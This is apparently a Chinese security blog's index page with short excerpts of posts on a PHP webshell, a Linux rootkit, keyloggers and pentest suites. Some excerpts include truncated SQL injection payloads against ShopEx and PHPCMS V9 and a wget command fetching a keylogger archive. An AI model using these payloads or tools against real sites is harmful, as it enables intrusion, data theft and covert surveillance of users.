本博客只做技术文章、工具的收藏!

feed订阅 新浪微博 你好,欢迎光临! 

隐蔽可扩展PHP Webshell – Weevely 1.0

2013.02.8 , , No Comments ,

Weevely是一款隐蔽模块化的PHP WEBSHELL,Weevely基于c/s模式构建,目前已经有30多个模块,功能涉及服务器错误配置审计,后门放置,暴+力破解,文件管理,资源搜索,网络代理,命令执行,数据库操作,系统信息收集及端口扫描等。 运行Weevely 1.0需要python2.7,笔者在win7+python2.7下测试通过。首先下载setuptools...

Linux Rootkit suterusu

2013.02.4 , , No Comments ,

前言 最早Rootkit用于善意用途,但后来Rootkit也被骇客用在入侵和攻击他人的电脑系统上,电脑病毒、间谍软件等也常使用Rootkit来隐藏踪迹,因此Rootkit已被大多数的防毒软件归类为具危害性的恶意软件。Linux、Windows、Mac OS等操作系统都有机会成为Rootkit的受害目标。 Rootkit出现于二十世纪90年代初,在1994年2月的一篇安...

Linux/unix 键盘记录 ixkeylog

2013.02.4 , , No Comments ,

ixkeylog是Linux/unix的一个键盘记录工具,支持Linux 2.6.x NetBSD FreeBSD OpenBSD 源代码可以在这里找到:点击下载 编译参数 Linux 2.6.x $ gmake -f Makefile.Linux ixkeylog $ ldd ./ixkeylog ...

Linux键盘记录sh2log keylogger notes

2013.02.4 , , No Comments ,

不仅可以记录到击键信息,而且包括终端下的输出信息 [root@Centos log]# wget http://www.i0day.com//exp/Linux/sh2log-1.0.tgz --2013-01-07 05:16:56-- http://www.i0day.com//exp/Linux/sh2log-1.0.tgz Resolving packetst...

新年礼物:shopex通杀注入两处

2013.02.4 , , No Comments ,

http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/b...

PHPCMS_V9注入0DAY___EXP已构造

2013.02.2 , , 1 Comment ,

PHPCMS_V9注入0DAY___EXP 漏洞来源:土司:https://www.t00ls.net/thread-21894-1-1.html EXP构造:haxsscker 土司只给了张烂图- -没给语句……那我就自己构造吧…… 本人构造结果如下: %60userid%60%3D%28select+1+from%28select+count%28%2A%29...

Thinksns 2.8 文件上传漏洞分析&完美利用

2013.01.31 , , 1 Comment ,

一. Thinksns简介 ThinkSNS(简称TS),是智士软件开源的开源微博、社交网络平台。采用PHP+MySQL技术平台,微博+应用的产品模式,通过应用、插件、风格包等丰富的机制来扩展功能,同时支持多种常见浏览器和移动客户端。拥有iphone、android客户端以及适合手机浏览的wap版界面,是建立社交网站、微博平台、移动互联网创业的首选二次开发平台。 Th...

手机中的Backtrack—移动渗透测试套件Revenssis

2013.01.31 , , No Comments ,

Revenssis是一款智能手机平台上的渗透测试套件,被称为“手机中的Backtrack”。 在它提供的工具包括:Web应用程序扫描器,编码/解码和hash破解工具,漏洞研究实验室以及一些其他渗透测试常用的功能,如shell,SSH,DNS / WHOIS查询,路由跟踪,端口扫描,垃圾邮件数据库查找,NETSTAT 等。 特性: SQL注入检测 XSS检测 DDOS...

PHP Vulnerability Hunter 1.3.87发布

2013.01.29 , , No Comments ,

最新版本的Php漏洞审计工具已经在4天前发布了。PHP Vulnerability Hunter是一款高级的自动化白盒Fuzz测试工具。最新版本是1.3.87.0,包括很多经过改进的特性像SQL注入漏洞扫描,基于静态分析的漏洞探测,改进的爬虫功能,任意文件上传扫面,集成测试,钩子检查,和一些对命令提示符的增强。这个工具能够在PHP应用中触发大量可被利用的报错。 &...

免费安全测试套件PenTBox

2013.01.29 , , No Comments ,

PenTBox是一款免费的安全套装,可以帮助技术人员对网络、系统的安全性和稳定性进行测试。PenTBox基于Ruby开发,面向GNU / Linux系统,且兼容Windows,MacOS和每一个操作系统。 特性: - 解码、密码破解工具 Base64 Encoder & Decoder Multi-Digest (MD5, SHA1, SHA256, SHA...